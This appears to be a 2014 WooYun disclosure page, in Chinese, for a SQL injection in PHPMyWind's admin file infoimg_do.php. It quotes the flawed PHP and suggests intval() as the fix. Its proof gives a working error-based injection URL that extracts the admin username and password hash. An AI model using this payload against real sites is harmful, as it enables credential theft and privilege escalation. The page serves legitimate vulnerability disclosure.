当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-082464

漏洞标题:PHPMyWind最新版SQL注入漏洞

相关厂商:phpmywind.com

漏洞作者: xfkxfk

提交时间:2014-11-10 15:10

修复时间:2015-02-08 15:12

公开时间:2015-02-08 15:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-10: 细节已通知厂商并且等待厂商处理中
2014-11-10: 厂商已经确认,细节仅向厂商公开
2014-11-13: 细节向第三方安全合作伙伴开放
2015-01-04: 细节向核心白帽子及相关领域专家公开
2015-01-14: 细节向普通白帽子公开
2015-01-24: 细节向实习白帽子公开
2015-02-08: 细节向公众公开

简要描述:

PHPMyWind最新版SQL注入漏洞,同一文件多处

详细说明:

PHPMyWind最新版SQL注入漏洞,同一文件多处
PHPMyWind的整个系统权限分为:

超级管理员
站点管理员
文章发布员
普通用户


此漏洞点在文章发布员权限,有点门槛,但是门槛不高
文件infoimg_do.php

<?php	require_once(dirname(__FILE__).'/inc/config.inc.php');IsModelPriv('infoimg');
/*
**************************
(C)2010-2014 phpMyWind.com
update: 2014-5-28 15:30:12
person: Feng
**************************
*/
//初始化参数
$action = isset($action) ? $action : '';
$keyword = isset($keyword) ? $keyword : '';
//删除单条记录
if($action == 'del')
{
//栏目权限验证
$r = $dosql->GetOne("SELECT `classid` FROM `#@__$tbname` WHERE `id`=$id");
IsCategoryPriv($r['classid'],'del',1);
$deltime = time();
$dosql->ExecNoneQuery("UPDATE `#@__$tbname` SET delstate='true', deltime='$deltime' WHERE id=$id");
}


可以看到这里有两处:
$tbname和$id
都是直接进入sql语句,没有任何引号保护和处理的,导致sql注入漏洞

漏洞证明:

登录文章发布员,发送如下请求,即可获得管理员权限

http://localhost/phpmywind/admin/infoimg_do.php?tbname=infoimg&action=del&id=15 and 1=2 and char(@`'`)=(select 1 from (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x23,password) FROM `pmw_admin` limit 0,1))a from information_schema.tables group by a limit 0,1)b) and char(@`'`)


这里利用id参数注入,tbname参数注入同理

1.png

修复方案:

intval($id)

版权声明:转载请注明来源 xfkxfk@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2014-11-10 15:17

厂商回复:

感谢提交漏洞

最新状态:

暂无